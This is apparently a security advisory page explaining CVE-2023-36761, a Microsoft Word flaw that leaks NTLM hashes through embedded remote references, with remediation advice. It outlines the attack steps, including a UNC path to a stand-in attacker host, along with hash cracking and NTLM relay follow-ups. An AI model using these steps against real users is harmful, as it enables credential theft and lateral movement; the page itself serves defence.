CVE-2023-36761

What is Microsoft Word?

Microsoft Word is the most widely deployed word processing application globally, part of the Microsoft Office and Microsoft 365 suite. Word processes .doc, .docx, .rtf, and other document formats that may contain embedded remote references — OLE objects, linked images, template references, and embedded resource paths that cause Word to make network connections when the document is opened. When Word makes an SMB or WebDAV connection to an attacker-controlled server, Windows automatically includes the user's NTLM authentication hash in the connection attempt — exposing credentials to the attacker through a credential harvesting technique with a long history in Office exploitation.

Overview

CVE-2023-36761 is an information disclosure vulnerability (CWE-20) in Microsoft Word that allows an attacker to leak the victim's NTLM authentication hash when the victim opens a malicious Word document. The document can be delivered via email, shared drive, or web download; when Word processes the embedded remote reference, it makes an outbound SMB connection to the attacker's server and Windows includes the NTLM hash in the connection attempt. Microsoft patched CVE-2023-36761 in the September 2023 Patch Tuesday as an actively exploited zero-day — with CISA simultaneously adding it to the KEV catalog on September 12, 2023.

CVE-2023-36761 is closely parallel to CVE-2023-36563 (Microsoft WordPad NTLM hash disclosure, patched in October 2023) — both exploit the same Windows NTLM authentication behavior through different Office applications.

Affected Versions

Technical Details

The NTLM hash disclosure mechanism in Word documents works identically to the WordPad vector (CVE-2023-36563):

1. Craft a malicious Word document — embed an OLE object, linked image, template reference, or UNC path (\\attacker.example.com\share\resource) in a .doc or .docx file
2. Deliver the document — send via email attachment, SharePoint, OneDrive link, or other document distribution channel
3. Victim opens the document — Word attempts to resolve the embedded remote reference, initiating an outbound SMB or WebDAV connection to the attacker's server
4. Windows sends the NTLM hash — Windows NTLM authentication automatically presents the user's NTLMv2 challenge-response when connecting to the attacker's server; the attacker captures the hash

With the NTLMv2 hash, the attacker can:

• Crack it offline — target weak passwords with dictionary or GPU-accelerated brute force attacks
• NTLM relay attack — relay the authentication to internal services (LDAP, SMB, Exchange autodiscover, IIS) impersonating the victim in real-time without knowing the plaintext password

The improper input validation (CWE-20) characterization reflects Word's failure to validate that embedded remote references should not trigger NTLM-bearing network connections.

Discovery

Microsoft confirmed CVE-2023-36761 was actively exploited as a zero-day at the time of the September 2023 Patch Tuesday. The September 2023 patch cycle followed a similar disclosure in August 2023 (CVE-2023-36884, Office HTML RCE used by Storm-0978) and preceded October 2023's companion NTLM hash disclosure via WordPad (CVE-2023-36563) — indicating sustained attacker investment in credential theft via Office document delivery in the second half of 2023.

Exploitation Context

NTLM hash exfiltration via Word documents is one of the most cost-effective credential theft techniques:

• Word documents are delivered and opened routinely in business environments without raising user suspicion
• The hash exfiltration is completely silent — the user sees the document open normally
• With the hash, attackers have deniable-origin credentials for lateral movement
• NTLM relay attacks using the captured hash can escalate a phishing click directly to domain controller access in some configurations (particularly against Exchange autodiscover, ADCS web enrollment endpoints, or SMB shares)

Remediation

1. Apply the September 2023 Microsoft Office update — patches CVE-2023-36761.
2. Block outbound SMB (TCP 445) from workstations to internet addresses via firewall rules — prevents the NTLM hash from reaching external attacker servers even if the document exploit succeeds.
3. Enable Extended Protection for Authentication (EPA) — reduces the effectiveness of NTLM relay attacks by binding authentication to the specific channel.
4. Evaluate NTLM deprecation — Microsoft recommends moving to Kerberos authentication for all internal services; disabling NTLM on the network eliminates relay attack risk entirely.
5. Apply Protected View settings — configure Office group policy to open documents from internet-sourced locations in Protected View, which prevents network connection attempts from embedded references until the user explicitly enables editing.